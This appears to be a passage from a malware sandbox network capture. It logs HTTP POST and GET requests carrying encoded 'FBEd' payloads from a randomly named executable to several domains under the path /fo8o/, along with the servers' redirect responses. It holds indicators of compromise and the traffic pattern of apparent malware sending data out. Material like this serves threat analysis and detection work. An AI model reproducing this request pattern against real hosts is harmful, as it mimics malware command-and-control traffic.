FBEd=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHbIHssK5rjMnBXxSQg8A8Cxqc6nQ==
May 8, 2024 10:49:35.016516924 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 08 May 2024 08:49:33 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49718	116.50.37.244	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:37.618297100 CEST	1825	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 52 78 6e 6e 44 47 38 7a 4d 2f 75 4b 57 32 35 65 38 33 55 76 75 7a 52 41 38 6f 59 79 39 4c 70 35 30 67 37 47 2f 34 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 7a 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a [TRUNCATED] Data Ascii: FBEd=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnDG8zM/uKW25e83UvuzRA8oYy9Lp50g7G/4SYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxkzfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpNYBMWckyw2DneIIRpTzQmt62A+5QXlbpe8H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rNVUpMLVsY6snP8C4frHTXdELdzMQSpCpGC0PQC/asq9IVMGXhARD54zim7vxRgCYPpU4zitrjjQ5IuySARVC7y2pE9gbAfINmRdtg41sNofxAMd9lKQ7bH/tvdducagD5KCwzB14l1ac4KLM90/IfioutTmt5tOu87F03ioQf+J+419WhjLJy/2G5TaAGhRSzFLsXJBxw1LdR9eFj74Pv23YCK6YzHsss4vJQQuR8+fMtG+zt+zkkJbahd5otRHFgxGOfPDmROyQxWuOX6zyxRU4XfxsltqyovtA055KZLEIKSLXiIJ831UdWlmsdAt1BkWdKAqWNJoQHgNCqxyH6h7+TD8ULfBB3XPcjCgy/c8NhxzJsdTETkIQl3hDCYgY5Ab1lkuYT+NHGrG6aN1gmni6AU5MIChwQGzltkVKkq+RdNjeC6Zgcm42nGu9vtBCNsUgmK3Uf/dsJ2Nr0U1RRorK9Jhqb/5yl+u+PHJB1kcJUrfpIdcASOq4dfRoAuApCR/hiTPw/yWzxMgq [TRUNCATED]
May 8, 2024 10:49:38.254314899 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 08 May 2024 08:49:38 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49719	116.50.37.244	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:40.478224993 CEST	507	OUT	GET /fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:49:40.817634106 CEST	873	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ== Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 08 May 2024 08:49:40 GMT Connection: close Content-Length: 295 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 34 68 38 3d 59 50 51 58 38 54 63 68 26 61 6d 70 3b 46 42 45 64 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 63 56 31 72 32 74 4e 6b 6f 68 72 6f 64 75 54 36 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 77 6e 63 69 75 79 51 73 79 38 77 31 63 71 2b 39 43 35 38 66 42 33 74 72 45 4e 44 34 56 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49720	46.30.213.191	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:46.618686914 CEST	785	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 53 73 64 6c 43 47 51 4b 70 51 30 4d 4e 37 53 4c 4a 68 54 63 79 33 58 63 47 2b 51 Data Ascii: FBEd=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnSsdlCGQKpQ0MN7SLJhTcy3XcG+Q
May 8, 2024 10:49:46.931341887 CEST	560	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Wed, 08 May 2024 08:59:46 GMT Last-Modified: Wed, 08 May 2024 08:49:46 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Wed, 08 May 2024 08:49:46 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 1754013053 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49721	46.30.213.191	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:49.466044903 CEST	809	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 72 5a 53 41 4c 36 67 62 53 51 32 4d 71 76 62 4e 34 62 4f 7a 45 32 32 4d 4c 69 41 77 3d 3d Data Ascii: FBEd=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFrZSAL6gbSQ2MqvbN4bOzE22MLiAw==
May 8, 2024 10:49:49.777137041 CEST	560	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Wed, 08 May 2024 08:59:49 GMT Last-Modified: Wed, 08 May 2024 08:49:49 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Wed, 08 May 2024 08:49:49 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 1795261335 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49722	46.30.213.191	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:52.310908079 CEST	1822	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 77 4f 43 71 33 36 4a 72 41 44 65 47 6d 59 5a 7a 54 50 6c 75 47 6f 75 75 4c 31 4b 4e 41 38 53 77 70 2b 30 2f 4f 72 54 70 70 47 6a 38 38 63 4f 58 55 38 73 54 4d 77 61 33 38 63 74 35 64 64 35 64 49 35 56 39 4d 39 66 4d 35 61 31 37 58 63 55 4b 44 7a 55 6c 2f 78 33 36 52 32 49 4e 4f 62 4f 45 70 62 4e 39 2f 4f 67 4c 67 32 4c 42 78 68 75 77 30 43 77 4b 6b 4b 68 38 36 65 4d 62 43 54 58 38 72 54 63 77 74 4b 76 58 53 61 6b 77 69 73 61 6e 55 72 2f 47 6d 49 74 33 52 4b 39 36 62 50 2b 69 66 78 51 [TRUNCATED] Data Ascii: FBEd=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJwOCq36JrADeGmYZzTPluGouuL1KNA8Swp+0/OrTppGj88cOXU8sTMwa38ct5dd5dI5V9M9fM5a17XcUKDzUl/x36R2INObOEpbN9/OgLg2LBxhuw0CwKkKh86eMbCTX8rTcwtKvXSakwisanUr/GmIt3RK96bP+ifxQWkrPZduiYh/QDByfmTs3OolUKqZbiP8yyqVs1pJg64J5EYbpThc6Ak1/jUoVr5bOq3a/POoshmotLHgZgE12xzL/q8UGvQTMEDRN2b6F53PzJ+kQ2qqWjcx/eJv/b5clHrjV8rz0NVXHFjj3vZ/jPS9Jd2Uezkd2RimdtBs/Qm4CObyhW9raJsHUBHZsDXivzJ7j0nK2smaIdpYOF5n0ytQSocC3IsM8vHF3IUthR+mDVXsqhWzC4juP0XdDmw9WR38G92hq5dsFu4nucFRf9MuZ8oR+uUL5RRq5ghGPcqnVkBZ1eb9cEVHd5I7LNJXgfpBp5dV+ie7biFD1pzIrJIf2GTV9xRwXTIt5CliI7En8uOiWG3UCo+vnvzMzrsvVvSDCtNZJUxtWfMjDrRv4wn3ZjSunO8SDQvIZaBJCxqtdADI+QtOLDWwSeMULBWfeZBhAhD0fxJFC9zJXKSihGqo9N/Qy9L3aWii1rT3JCGyBx0Ct4JlDwblTKeFGQAflcL0uqL+Pc7MhgpH0V4mxb+q2hee3rZJtB7GjicKRhAHPjVL6u5TokQacg2cktypkxyqyw0LU3gxJ6qmwpEqh3FqnkDLxbIDxjAdpyUWVsoc7txBOwPNhobixrqqTpMDiorTMM7impRfCzUzQXelykl/Phmch5sAryR [TRUNCATED]
May 8, 2024 10:49:52.622256994 CEST	560	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Wed, 08 May 2024 08:59:52 GMT Last-Modified: Wed, 08 May 2024 08:49:52 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Wed, 08 May 2024 08:49:52 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 1685887819 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49723	46.30.213.191	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:55.162235975 CEST	506	OUT	GET /fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.antonio-vivaldi.mobi Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:49:55.473931074 CEST	842	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 310 Expires: Wed, 08 May 2024 08:59:55 GMT Last-Modified: Wed, 08 May 2024 08:49:55 GMT Date: Wed, 08 May 2024 08:49:55 GMT Content-Type: text/html; charset=utf-8 location: https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch X-Onecom-Cluster-Name: X-Varnish: 1765543436 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 46 42 45 64 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4e 64 31 48 57 69 26 23 34 33 3b 65 4b 4f 69 4a 55 52 4a 52 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 62 7a 4a 51 26 23 34 33 3b 4a 6b 6c 4c 30 53 6a 30 36 33 39 69 69 53 54 49 67 6b 6a 38 77 47 4f 36 41 3d 3d 26 61 6d 70 3b 34 68 38 3d 59 50 51 58 38 54 63 68 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49724	85.159.66.93	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
